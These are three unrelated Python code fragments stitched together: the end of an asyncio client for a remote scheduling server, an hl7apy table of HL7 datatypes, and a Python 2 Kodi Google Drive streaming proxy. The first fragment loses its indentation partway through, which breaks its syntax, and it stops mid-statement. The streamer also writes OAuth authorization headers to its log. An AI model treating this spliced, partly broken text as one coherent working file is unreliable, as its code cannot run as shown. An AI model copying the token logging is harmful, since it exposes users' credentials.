        return await self._request(StopSchedule(name=name))

    async def __aenter__(self):
        if not await self.is_connected():
            await self.start_async()
        return self

    async def __aexit__(self, *args, **kwargs):
        await self.stop_async()

    def __enter__(self):
        if not self._is_connected:
            self.loop.run_until_complete(self.start_async())
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.loop.run_until_complete(self.stop_async())
        # BUGFIX: the old code returned ``exc_type is not None``, which is
        # True exactly when an exception occurred -- a truthy return from
        # __exit__ suppresses the exception, so every error inside a
        # ``with Client(...)`` block was silently swallowed.
        return False

    # ========== Loop Functions ==========
    def create_task(self, coro, *, name=None):
        """Create a task to run on the loop"""
        return self.loop.create_task(coro, name=name)

    def run_until_complete(self, future):
        """Start running the asyncio event loop until the given future is complete."""
        return self.loop.run_until_complete(future)

    def run_forever(self):
        """Start running the asyncio event loop forever."""
        return self.loop.run_forever()
async def quit_server_async(addr: Tuple[str, int]):
    """Ask the server at *addr* to shut down and return its reply.

    Args:
        addr (tuple): Server IP address
    """
    client = Client(addr)
    async with client:
        return await client.send_quit()
def quit_server(addr: Tuple[str, int], loop: asyncio.AbstractEventLoop = None):
    """Synchronous wrapper around :func:`quit_server_async`.

    Args:
        addr (tuple): Server IP address
        loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
    """
    event_loop = loop if loop is not None else get_loop()
    return event_loop.run_until_complete(quit_server_async(addr))
async def update_server_async(addr: Tuple[str, int], module_name: str = '', list_schedules: bool = False):
    """Ask the server to import/reload modules, optionally listing schedules.

    Args:
        addr (tuple): Server IP address
        module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
        list_schedules (bool)[False]: If True request and print the schedules that the server is running.
    """
    async with Client(addr) as client:
        response = await client.send_update(module_name=module_name)
        if list_schedules:
            # The schedule listing replaces the update reply as the result.
            response = await client.request_schedules(print_results=True)
        return response
def update_server(addr: Tuple[str, int], module_name: str = '', list_schedules: bool = False,
                  loop: asyncio.AbstractEventLoop = None):
    """Synchronous wrapper around :func:`update_server_async`.

    Args:
        addr (tuple): Server IP address
        module_name (str)['']: Module name to import/reload. If blank import/reload all modules.
        list_schedules (bool)[False]: If True request and print the schedules that the server is running.
        loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
    """
    event_loop = loop if loop is not None else get_loop()
    return event_loop.run_until_complete(update_server_async(addr, module_name, list_schedules))
async def request_schedules_async(addr: Tuple[str, int], print_results: bool = True):
    """Fetch the list of schedules running on the server.

    Args:
        addr (tuple): Server IP address
        print_results (bool)[True]: If true print the schedules that were returned.
    """
    client = Client(addr)
    async with client:
        return await client.request_schedules(print_results=print_results)
def request_schedules(addr: Tuple[str, int], print_results: bool = True, loop: asyncio.AbstractEventLoop = None):
    """Synchronous wrapper around :func:`request_schedules_async`.

    Args:
        addr (tuple): Server IP address
        print_results (bool)[True]: If true print the schedules that were returned.
        loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
    """
    event_loop = loop if loop is not None else get_loop()
    return event_loop.run_until_complete(request_schedules_async(addr, print_results=print_results))
async def run_command_async(addr: Tuple[str, int],
                            callback_name: str = '', *args, **kwargs):
    """Run a registered callback function on the remote server.

    Args:
        addr (tuple): Server IP address
        callback_name (str)['']: Name of the registered callback function.
        *args: Positional arguments for the callback function.
        **kwargs: Keyword Arguments for the callback function.

    Raises:
        ValueError: If *callback_name* is empty.
    """
    if not callback_name:
        raise ValueError('Invalid callback name given')
    client = Client(addr)
    async with client:
        return await client.run_command(callback_name, *args, **kwargs)
def run_command(addr: Tuple[str, int],
                callback_name: str = '', *args, loop: asyncio.AbstractEventLoop = None, **kwargs):
    """Synchronous wrapper around :func:`run_command_async`.

    Args:
        addr (tuple): Server IP address
        callback_name (str)['']: Name of the registered callback function.
        *args: Positional arguments for the callback function.
        **kwargs: Keyword Arguments for the callback function.
        loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
    """
    event_loop = loop if loop is not None else get_loop()
    coro = run_command_async(addr, callback_name, *args, **kwargs)
    return event_loop.run_until_complete(coro)
async def schedule_command_async(addr: Tuple[str, int],
                                 name: str = '', schedule: Schedule = None, callback_name: str = '', *args, **kwargs):
    """Schedule a registered callback to run on the remote server.

    Args:
        addr (tuple): Server IP address
        name (str)['']: Name of the schedule.
        schedule (Schedule)[None]: Schedule to run the callback function with.
        callback_name (str)['']: Name of the registered callback function.
        *args: Positional arguments for the callback function.
        **kwargs: Keyword Arguments for the callback function.

    Raises:
        ValueError: If *name*, *schedule*, or *callback_name* is missing.
    """
    if not name:
        raise ValueError('Must give a name to keep track of the schedule!')
    if schedule is None:
        raise ValueError('Invalid schedule given!')
    if not callback_name:
        raise ValueError('Invalid callback name given!')
    client = Client(addr)
    async with client:
        return await client.schedule_command(name, schedule, callback_name, *args, **kwargs)
def schedule_command(addr: Tuple[str, int],
                     name: str = '', schedule: Schedule = None, callback_name: str = '', *args,
                     loop: asyncio.AbstractEventLoop = None, **kwargs):
    """Synchronous wrapper around :func:`schedule_command_async`.

    Args:
        addr (tuple): Server IP address
        name (str)['']: Name of the schedule.
        schedule (Schedule)[None]: Schedule to run the callback function with.
        callback_name (str)['']: Name of the registered callback function.
        *args: Positional arguments for the callback function.
        **kwargs: Keyword Arguments for the callback function.
        loop (asyncio.AbstractEventLoop)[None]: Event loop to run the async command with.
    """
    event_loop = loop if loop is not None else get_loop()
    coro = schedule_command_async(addr, name, schedule, callback_name, *args, **kwargs)
    return event_loop.run_until_complete(coro)
async def stop_schedule_async(addr: Tuple[str, int], name: str = '', list_schedules: bool = False):
"""Send a command to the server to stop running a schedule.
Args:
addr (tuple): Server IP address
name (str)['']: Name of the schedule.
list_schedules (bool)[False]: If True request and print the schedules that the server is running.
"""
if not name:
raise ValueError('Must give a name to keep track of the schedule!')
async with Client(addr) as client:
msg = await | |
<gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from hl7apy.utils import iteritems
DATATYPES = {
'AD_1': ['leaf', None, 'ST', 'STREET_ADDRESS', None, -1],
'AD_2': ['leaf', None, 'ST', 'OTHER_DESIGNATION', None, -1],
'AD_3': ['leaf', None, 'ST', 'CITY', None, -1],
'AD_4': ['leaf', None, 'ST', 'STATE_OR_PROVINCE', None, -1],
'AD_5': ['leaf', None, 'ID', 'ZIP_OR_POSTAL_CODE', None, -1],
'AD_6': ['leaf', None, 'ID', 'COUNTRY', None, -1],
'AD_7': ['leaf', None, 'ID', 'TYPE', None, -1],
'AD_8': ['leaf', None, 'ST', 'OTHER_GEOGRAPHIC_DESIGNATION', None, -1],
'CE_1': ['leaf', None, 'ID', 'IDENTIFIER', None, -1],
'CE_2': ['leaf', None, 'ST', 'TEXT', None, -1],
'CE_3': ['leaf', None, 'ST', 'NAME_OF_CODING_SYSTEM', None, -1],
'CE_4': ['leaf', None, 'ST', 'ALTERNATE_IDENTIFIER', None, -1],
'CE_5': ['leaf', None, 'ST', 'ALTERNATE_TEXT', None, -1],
'CE_6': ['leaf', None, 'ST', 'NAME_OF_ALTERNATE_CODING_SYSTEM', None, -1],
'CK_1': ['leaf', None, 'NM', 'ID_NUMBER', None, -1],
'CK_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CK_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', 'HL70061', -1],
'CK_4': ['leaf', None, 'ST', 'ASSIGNING_FACILITY_ID', None, -1],
'CK_ACCOUNT_NO_1': ['leaf', None, 'NM', 'ACCOUNT_NUMBER', None, -1],
'CK_ACCOUNT_NO_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CK_ACCOUNT_NO_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CK_ACCOUNT_NO_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_ABS_RANGE_1': ['sequence', None, 'CM_RANGE_SIMPLE', 'RANGE', None, -1],
'CM_ABS_RANGE_2': ['leaf', None, 'NM', 'NUMERIC_CHANGE', None, -1],
'CM_ABS_RANGE_3': ['leaf', None, 'NM', 'PERCENT_PER_CHANGE', None, -1],
'CM_ABS_RANGE_4': ['leaf', None, 'NM', 'DAYS', None, -1],
'CM_AUI_1': ['leaf', None, 'ST', 'AUTHORIZATION_NUMBER', None, -1],
'CM_AUI_2': ['leaf', None, 'DT', 'DATE', None, -1],
'CM_AUI_3': ['leaf', None, 'ST', 'SOURCE', None, -1],
'CM_BATCH_TOTAL_1': ['leaf', None, 'NM', 'CM_BATCH_TOTAL_1', None, -1],
'CM_BATCH_TOTAL_2': ['leaf', None, 'NM', 'CM_BATCH_TOTAL_2', None, -1],
'CM_CCD_1': ['leaf', None, 'ID', 'WHEN_TO_CHARGE', None, -1],
'CM_CCD_2': ['sequence', None, 'TS', 'DATE_TIME', None, -1],
'CM_DDI_1': ['leaf', None, 'ST', 'DELAY_DAYS', None, -1],
'CM_DDI_2': ['leaf', None, 'NM', 'AMOUNT', None, -1],
'CM_DDI_3': ['leaf', None, 'NM', 'NUMBER_OF_DAYS', None, -1],
'CM_DIN_1': ['sequence', None, 'TS', 'DATE', None, -1],
'CM_DIN_2': ['sequence', None, 'CE', 'INSTITUTION_NAME', None, -1],
'CM_DLD_1': ['leaf', None, 'ID', 'DISCHARGE_LOCATION', None, -1],
'CM_DLD_2': ['sequence', None, 'TS', 'EFFECTIVE_DATE', None, -1],
'CM_DLT_1': ['sequence', None, 'CM_RANGE_SIMPLE', 'RANGE', None, -1],
'CM_DLT_2': ['leaf', None, 'NM', 'NUMERIC_THRESHOLD', None, -1],
'CM_DLT_3': ['leaf', None, 'ST', 'CHANGE', None, -1],
'CM_DLT_4': ['leaf', None, 'NM', 'LENGTH_OF_TIME_DAYS', None, -1],
'CM_DTN_1': ['leaf', None, 'ID', 'DAY_TYPE', None, -1],
'CM_DTN_2': ['leaf', None, 'NM', 'NUMBER_OF_DAYS', None, -1],
'CM_EIP_1': ['leaf', None, 'ST', 'PARENT_S_PLACER_ORDER_NUMBER', None, -1],
'CM_EIP_2': ['leaf', None, 'ST', 'PARENT_S_FILLER_ORDER_NUMBER', None, -1],
'CM_ELD_1': ['leaf', None, 'ST', 'SEGMENT_ID', None, -1],
'CM_ELD_2': ['leaf', None, 'NM', 'SEQUENCE', None, -1],
'CM_ELD_3': ['leaf', None, 'NM', 'FIELD_POSITION', None, -1],
'CM_ELD_4': ['sequence', None, 'CE', 'CODE_IDENTIFYING_ERROR', None, -1],
'CM_FILLER_1': ['leaf', None, 'ID', 'UNIQUE_FILLER_ID', None, -1],
'CM_FILLER_2': ['leaf', None, 'ID', 'FILLER_APPLICATION_ID', None, -1],
'CM_FINANCE_1': ['leaf', None, 'ID', 'FINANCIAL_CLASS_ID', None, -1],
'CM_FINANCE_2': ['sequence', None, 'TS', 'EFFECTIVE_DATE', None, -1],
'CM_GROUP_ID_1': ['leaf', None, 'ID', 'UNIQUE_GROUP_ID', None, -1],
'CM_GROUP_ID_2': ['leaf', None, 'ID', 'PLACER_APPLICATION_ID', None, -1],
'CM_INTERNAL_LOCATION_1': ['leaf', None, 'ID', 'NURSE_UNIT_STATION', None, -1],
'CM_INTERNAL_LOCATION_2': ['leaf', None, 'ID', 'ROOM', None, -1],
'CM_INTERNAL_LOCATION_3': ['leaf', None, 'ID', 'BED', None, -1],
'CM_INTERNAL_LOCATION_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_INTERNAL_LOCATION_5': ['leaf', None, 'ID', 'BED_STATUS', None, -1],
'CM_INTERNAL_LOCATION_6': ['leaf', None, 'ID', 'ETAGE', None, -1],
'CM_INTERNAL_LOCATION_7': ['leaf', None, 'ID', 'KLINIK', None, -1],
'CM_INTERNAL_LOCATION_8': ['leaf', None, 'ID', 'ZENTRUM', None, -1],
'CM_JOB_CODE_1': ['leaf', None, 'ID', 'JOB_CODE', None, -1],
'CM_JOB_CODE_2': ['leaf', None, 'ID', 'EMPLOYEE_CLASSIFICATION', None, -1],
'CM_LA1_1': ['sequence', None, 'CM_INTERNAL_LOCATION', 'DISPENSE_DELIVER_TO_LOCATION', None, -1],
'CM_LA1_2': ['sequence', None, 'AD', 'LOCATION', None, -1],
'CM_LICENSE_NO_1': ['leaf', None, 'ST', 'LICENSE_NUMBER', None, -1],
'CM_LICENSE_NO_2': ['leaf', None, 'ST', 'ISSUING_STATE_PROVINCE_COUNTRY', None, -1],
'CM_MOC_1': ['leaf', None, 'ST', 'DOLLAR_AMOUNT', None, -1],
'CM_MOC_2': ['leaf', None, 'ST', 'CHARGE_CODE', None, -1],
'CM_MSG_1': ['leaf', None, 'ID', 'MESSAGE_TYPE', None, -1],
'CM_MSG_2': ['leaf', None, 'ID', 'TRIGGER_EVENT', None, -1],
'CM_NDL_1': ['sequence', None, 'CN', 'INTERPRETER_TECHNICIAN', None, -1],
'CM_NDL_2': ['sequence', None, 'TS', 'START_DATE_TIME', None, -1],
'CM_NDL_3': ['sequence', None, 'TS', 'END_DATE_TIME', None, -1],
'CM_NDL_4': ['sequence', None, 'CM_INTERNAL_LOCATION', 'LOCATION', None, -1],
'CM_OCD_1': ['leaf', None, 'ID', 'OCCURRENCE_CODE', None, -1],
'CM_OCD_2': ['leaf', None, 'DT', 'OCCURRENCE_DATE', None, -1],
'CM_OSP_1': ['leaf', None, 'ID', 'OCCURRENCE_SPAN_CODE', None, -1],
'CM_OSP_2': ['leaf', None, 'DT', 'OCCURRENCE_SPAN_START_DATE', None, -1],
'CM_OSP_3': ['leaf', None, 'DT', 'OCCURRENCE_SPAN_STOP_DATE', None, -1],
'CM_PARENT_RESULT_1': ['sequence', None, 'CE', 'OBSERVATION_IDENTIFIER_OBX_3_OF_PARENT_RESULT', None, -1],
'CM_PARENT_RESULT_2': ['leaf', None, 'ST', 'SUB_ID_OBX_4_OF_PARENT_RESULT', None, -1],
'CM_PARENT_RESULT_3': ['sequence', None, 'CE', 'RESULT_OBX_5_OF_PARENT_RESULT', None, -1],
'CM_PAT_ID_1': ['leaf', None, 'ST', 'PATIENT_ID', None, -1],
'CM_PAT_ID_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CM_PAT_ID_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CM_PAT_ID_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_PAT_ID_5': ['leaf', None, 'ID', 'TYPE', None, -1],
'CM_PAT_ID_0192_1': ['leaf', None, 'ST', 'PATIENT_ID', None, -1],
'CM_PAT_ID_0192_2': ['leaf', None, 'NM', 'CHECK_DIGIT', None, -1],
'CM_PAT_ID_0192_3': ['leaf', None, 'ID', 'CHECK_DIGIT_SCHEME', None, -1],
'CM_PAT_ID_0192_4': ['leaf', None, 'ID', 'FACILITY_ID', None, -1],
'CM_PAT_ID_0192_5': ['leaf', None, 'ID', 'TYPE', 'HL70192', -1],
'CM_PCF_1': ['leaf', None, 'ID', 'PRE_CERTIFICATION_PATIENT_TYPE', None, -1],
'CM_PCF_2': ['leaf', None, 'ID', 'PRE_CERTICATION_REQUIRED', None, -1],
'CM_PCF_3': ['sequence', None, 'TS', 'PRE_CERTIFICATION_WINDOW', None, -1],
'CM_PEN_1': ['leaf', None, 'ID', 'PENALTY_ID', None, -1],
'CM_PEN_2': ['leaf', None, 'NM', 'PENALTY_AMOUNT', None, -1],
'CM_PIP_1': ['sequence', None, 'CE', 'PRIVILEGE', None, -1],
'CM_PIP_2': ['sequence', None, 'CE', 'PRIVILEGE_CLASS', None, -1],
'CM_PIP_3': ['leaf', None, 'DT', 'EXPIRATION_DATE', None, -1],
'CM_PIP_4': ['leaf', None, 'DT', 'ACTIVATION_DATE', None, -1],
'CM_PLACER_1': ['leaf', None, 'ID', 'UNIQUE_PLACER_ID', None, -1],
'CM_PLACER_2': ['leaf', None, 'ID', 'PLACER_APPLICATION', None, -1],
'CM_PLN_1': ['leaf', None, 'ST', 'ID_NUMBER', None, -1],
'CM_PLN_2': ['leaf', None, 'ID', 'TYPE_OF_ID_NUMBER_ID', None, -1],
'CM_PLN_3': ['leaf', None, 'ST', 'STATE_OTHER_QUALIFIYING_INFO', None, -1],
'CM_POSITION_1': ['leaf', None, 'ST', 'SAAL', None, -1],
'CM_POSITION_2': ['leaf', None, 'ST', 'TISCH', None, -1],
'CM_POSITION_3': ['leaf', None, 'ST', 'STUHL', None, -1],
'CM_PRACTITIONER_1': ['sequence', None, 'CN', 'PROCEDURE_PRACTITIONER_ID', None, -1],
'CM_PRACTITIONER_2': ['leaf', None, 'ID', 'PROCEDURE_PRACTITIONER_TYPE', None, -1],
'CM_PTA_1': ['leaf', None, 'ID', 'POLICY_TYPE', 'HL70147', -1],
'CM_PTA_2': ['leaf', None, 'ID', 'AMOUNT_CLASS', 'HL70193', -1],
'CM_PTA_3': ['leaf', None, 'NM', 'AMOUNT', None, -1],
'CM_RANGE_1': ['sequence', None, 'CE', 'LOW_VALUE', None, -1],
'CM_RANGE_2': ['sequence', None, 'CE', 'HIGH_VALUE', None, -1],
'CM_RANGE_SIMPLE_1': ['leaf', None, 'ST', 'LOW_VALUE', None, -1],
'CM_RANGE_SIMPLE_2': ['leaf', None, 'ST', 'HIGH_VALUE', None, -1],
'CM_RFR_1': ['sequence', None, 'CE', 'REFERENCE_RANGE', None, -1],
'CM_RFR_2': ['leaf', None, 'ID', 'SEX', None, -1],
'CM_RFR_3': ['sequence', None, 'CE', 'AGE_RANGE', None, -1],
'CM_RFR_4': ['sequence', None, 'CE', 'GESTATIONAL_AGE_RANGE', None, -1],
'CM_RFR_5': ['leaf', None, 'ST', 'SPECIES', None, -1],
'CM_RFR_6': ['leaf', None, 'ID', 'RACE_SUBSPECIES', None, -1],
'CM_RFR_7': ['leaf', None, 'ST', 'TEXT_CONDITION', None, -1],
'CM_RMC_1': ['leaf', None, 'ID', 'ROOM_TYPE', None, -1],
'CM_RMC_2': ['leaf', None, 'ID', 'AMOUNT_TYPE', None, -1],
'CM_RMC_3': ['leaf', None, 'NM', 'COVERAGE_AMOUNT', None, -1],
'CM_SPD_1': ['leaf', None, 'ST', 'SPECIALTY_NAME', None, -1],
'CM_SPD_2': ['leaf', None, 'ST', 'GOVERNING_BOARD', None, -1],
'CM_SPD_3': ['leaf', None, 'ID', 'ELIGIBLE_OR_CERTIFIED', None, -1],
'CM_SPD_4': ['leaf', None, 'DT', 'DATE_OF_CERTIFICATION', None, -1],
'CM_SPS_1': ['sequence', None, 'CE', 'SPECIMEN_SOURCE_NAME_OR_CODE', None, -1],
'CM_SPS_2': ['leaf', None, 'TX', 'ADDITIVES', None, -1],
'CM_SPS_3': ['leaf', None, 'TX', 'FREETEXT', None, -1],
'CM_SPS_4': ['sequence', None, 'CE', 'BODY_SITE', None, -1],
'CM_SPS_5': ['sequence', None, 'CE', 'SITE_MODIFIER', None, -1],
'CM_UVC_1': ['leaf', None, 'ID', 'VALUE_CODE', None, -1],
'CM_UVC_2': ['leaf', None, 'NM', 'VALUE_AMOUNT', None, -1],
'CM_VR_1': ['leaf', None, 'ST', 'FIRST_DATA_CODE_VALUE', None, -1],
'CM_VR_2': ['leaf', None, 'ST', 'LAST_DATA_CODE_CALUE', None, -1],
'CN_1': ['leaf', None, 'ID', 'ID_NUMBER', None, -1],
'CN_2': ['leaf', None, 'ST', 'FAMILIY_NAME', None, -1],
'CN_3': ['leaf', None, 'ST', 'GIVEN_NAME', None, -1],
'CN_4': ['leaf', None, 'ST', 'MIDDLE_INITIAL_OR_NAME', None, -1],
'CN_5': ['leaf', None, 'ST', 'SUFFIX_E_G_JR_OR_III', None, -1],
'CN_6': ['leaf', None, 'ST', 'PREFIX_E_G_DR', None, -1],
'CN_7': ['leaf', None, 'ST', 'DEGREE_E_G_MD', None, -1],
'CN_8': ['leaf', None, 'ID', 'SOURCE_TABLE_ID', None, -1],
'CQ_1': ['leaf', None, 'ST', 'QUANTITY', None, -1],
'CQ_2': ['leaf', None, 'ST', 'UNITS', None, -1],
'PN_1': ['leaf', None, 'ST', 'FAMILIY_NAME', | |
<reponame>akuala/REPO.KUALA<filename>plugin.video.gdrive/resources/lib/streamer.py<gh_stars>1-10
'''
Copyright (C) 2014-2016 ddurdle
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from SocketServer import ThreadingMixIn
import threading
import re
import urllib, urllib2
import xbmc, xbmcaddon, xbmcgui, xbmcplugin
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """Handle requests in a separate thread."""
    # ThreadingMixIn dispatches each incoming request to its own thread so
    # one long-running stream does not block other requests.
class MyHTTPServer(ThreadingMixIn,HTTPServer):
    """Threaded HTTP server that carries shared playback state.

    The request-handler threads read and write these attributes through
    ``self.server`` (playback URL, cloud-service account, crypto flag,
    cached content length, ...).
    """
    def __init__(self, *args, **kw):
        HTTPServer.__init__(self, *args, **kw)
        # ``ready`` is polled by the serve loop; a request to /kill sets
        # it False to shut the server down.
        self.ready = True

    def setFile(self, playbackURL, chunksize, playbackFile, response, fileSize, url, service):
        """Record the parameters needed to stream a single file."""
        self.playbackURL = playbackURL
        self.chunksize = chunksize
        self.playbackFile = playbackFile
        self.response = response
        self.fileSize = fileSize
        self.url = url
        self.service = service
        self.ready = True
        self.state = 0
        self.lock = 0

    def setURL(self, playbackURL):
        """Update only the playback URL."""
        self.playbackURL = playbackURL

    def setAccount(self, service, domain):
        """Attach the cloud-service account and reset playback state."""
        self.service = service
        self.domain = domain
        self.playbackURL = ''
        # Encrypted-stream mode stays off until /crypto_playurl enables it.
        self.crypto = False
        self.ready = True
class myStreamer(BaseHTTPRequestHandler):
    # Handler for the POST requests
    def do_POST(self):
        """Handle control POSTs: /kill, /playurl and /crypto_playurl.

        /playurl and /crypto_playurl store the real cloud URL (and, for the
        former, the DRIVE_STREAM cookie value) on the server object so that
        a later GET /play can proxy the stream.
        """
        # debug - print headers in log
        headers = str(self.headers)
        print(headers)

        # passed a kill signal?
        if self.path == '/kill':
            self.server.ready = False
            return

        # redirect url to output
        elif self.path == '/playurl':
            content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
            post_data = self.rfile.read(content_length) # <--- Gets the data itself
            #print post_data

            # Extract the stream URL and the DRIVE_STREAM cookie value from
            # the url=...|Cookie=DRIVE_STREAM%3D... payload.
            for r in re.finditer('url\=([^\|]+)\|Cookie\=DRIVE_STREAM\%3D([^\&]+)' ,
                                 post_data, re.DOTALL):
                url = r.group(1)
                drive_stream = r.group(2)
                print "drive_stream = " + drive_stream + "\n"
                print "url = " + url + "\n"

            self.server.playbackURL = url
            self.server.drive_stream = drive_stream
            # NOTE(review): '<PASSWORD>STREAM' looks like an automated
            # redaction of the original cookie name (likely 'DRIVE_STREAM')
            # -- confirm against the upstream source before relying on it.
            self.server.service.authorization.setToken('<PASSWORD>STREAM',drive_stream)

            self.send_response(200)
            self.end_headers()

        elif self.path == '/crypto_playurl':
            content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
            post_data = self.rfile.read(content_length) # <--- Gets the data itself
            #print post_data

            for r in re.finditer('url\=([^\|]+)' ,
                                 post_data, re.DOTALL):
                url = r.group(1)
                drive_stream = ''
                print "drive_stream = " + drive_stream + "\n"
                print "url = " + url + "\n"

            # Encrypted stream: no cookie needed; turn crypto mode on so
            # do_GET decrypts while relaying.
            self.server.crypto = True
            self.server.playbackURL = url
            self.server.drive_stream = drive_stream

            self.send_response(200)
            self.end_headers()
    def do_HEAD(self):
        """Answer a HEAD probe for /play by forwarding it to the cloud URL.

        Issues an upstream HEAD request with the service's auth headers
        (refreshing the OAuth token once on 401/403) and mirrors the
        relevant response headers back to the caller.  Also caches the
        upstream Content-Length on the server object for later ranged GETs.
        """
        # debug - print headers in log
        headers = str(self.headers)
        print(headers)

        # passed a kill signal?
        if self.path == '/kill':
            self.server.ready = False
            return

        # redirect url to output
        elif self.path == '/play':
            url = self.server.playbackURL
            print 'HEAD ' + url + "\n"

            req = urllib2.Request(url, None, self.server.service.getHeadersList())
            req.get_method = lambda : 'HEAD'
            try:
                response = urllib2.urlopen(req)
            except urllib2.URLError, e:
                # 401/403 usually means the access token expired --
                # refresh and retry exactly once.
                if e.code == 403 or e.code == 401:
                    print "ERROR\n" + self.server.service.getHeadersEncoded()
                    self.server.service.refreshToken()
                    req = urllib2.Request(url, None, self.server.service.getHeadersList())
                    req.get_method = lambda : 'HEAD'
                    try:
                        response = urllib2.urlopen(req)
                    except:
                        print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
                        return
                else:
                    return

            self.send_response(200)
            #print str(response.info()) + "\n"

            # Mirror the upstream headers the video player cares about.
            self.send_header('Content-Type',response.info().getheader('Content-Type'))
            self.send_header('Content-Length',response.info().getheader('Content-Length'))
            self.send_header('Cache-Control',response.info().getheader('Cache-Control'))
            self.send_header('Date',response.info().getheader('Date'))
            self.send_header('Content-type','video/mp4')
            self.send_header('Accept-Ranges','bytes')
            #self.send_header('ETag',response.info().getheader('ETag'))
            #self.send_header('Server',response.info().getheader('Server'))
            self.end_headers()

            ## may want to add more granular control over chunk fetches
            #self.wfile.write(response.read())

            response.close()
            print "DONE"
            # Cache the total file size; do_GET uses it to build
            # Content-Range headers.
            self.server.length = response.info().getheader('Content-Length')

        # redirect url to output
        else:
            url = str(self.server.domain) + str(self.path)
            print 'GET ' + url + "\n"
    #Handler for the GET requests
    def do_GET(self):
        """Proxy a (possibly ranged) GET of the stored playback URL.

        Parses the incoming Range header, forwards the request upstream
        with the service's auth headers (refreshing the OAuth token once on
        401/403), and relays the response body in 16 KB chunks, decrypting
        on the fly when crypto mode is enabled.
        """
        # debug - print headers in log
        headers = str(self.headers)
        print(headers)

        start = ''
        end = ''
        startOffset = 0
        # Parse "Range: bytes=<start>-" from the request headers.
        for r in re.finditer('Range\:\s+bytes\=(\d+)\-' ,
                             headers, re.DOTALL):
            start = int(r.group(1))
            break
        # Parse the optional "<end>" part of the Range header.
        for r in re.finditer('Range\:\s+bytes\=\d+\-(\d+)' ,
                             headers, re.DOTALL):
            end = int(r.group(1))
            break

        # passed a kill signal?
        if self.path == '/kill':
            self.server.ready = False
            return

        # redirect url to output
        elif self.path == '/play':
            # For encrypted streams an open-ended range is realigned so the
            # upstream fetch starts on a cipher-block boundary; presumably
            # 16 is the AES block size and 8 a stream-header size -- TODO
            # confirm against resources.lib.encryption.
            if (self.server.crypto and start != '' and start > 16 and end == ''):
                #start = start - (16 - (end % 16))
                print "START = " + str(start)
                startOffset = 16-(( int(self.server.length) - start) % 16)+8

            # if (self.server.crypto and start == 23474184 ):
                #start = start - (16 - (end % 16))
            #     start = 23474184 - 8

            url = self.server.playbackURL
            print 'GET ' + url + "\n" + self.server.service.getHeadersEncoded() + "\n"

            # Forward the request upstream, with a Range header when the
            # caller asked for one (shifted back by startOffset).
            if start == '':
                req = urllib2.Request(url, None, self.server.service.getHeadersList())
            else:
                req = urllib2.Request(url, None, self.server.service.getHeadersList(additionalHeader='Range', additionalValue='bytes='+str(start- startOffset)+'-' + str(end)))
            try:
                response = urllib2.urlopen(req)
            except urllib2.URLError, e:
                # 401/403: refresh the OAuth token and retry exactly once.
                if e.code == 403 or e.code == 401:
                    print "ERROR\n" + self.server.service.getHeadersEncoded()
                    self.server.service.refreshToken()
                    req = urllib2.Request(url, None, self.server.service.getHeadersList())
                    try:
                        response = urllib2.urlopen(req)
                    except:
                        print "STILL ERROR\n" + self.server.service.getHeadersEncoded()
                        return
                else:
                    return

            # 200 for a full response, 206 + Content-Range for a ranged one.
            if start == '':
                self.send_response(200)
                self.send_header('Content-Length',response.info().getheader('Content-Length'))
            else:
                self.send_response(206)
                self.send_header('Content-Length', str(int(response.info().getheader('Content-Length'))-startOffset))
                #self.send_header('Content-Range','bytes ' + str(start) + '-' +str(end))
                if end == '':
                    self.send_header('Content-Range','bytes ' + str(start) + '-' +str(int(self.server.length)-1) + '/' +str(int(self.server.length)))
                else:
                    self.send_header('Content-Range','bytes ' + str(start) + '-' + str(end) + '/' +str(int(self.server.length)))
                #self.send_header('Content-Range',response.info().getheader('Content-Range'))
                print 'Content-Range!!!' + str(start) + '-' + str(int(self.server.length)-1) + '/' +str(int(self.server.length)) + "\n"

            print str(response.info()) + "\n"
            # Mirror the upstream headers the video player cares about.
            self.send_header('Content-Type',response.info().getheader('Content-Type'))
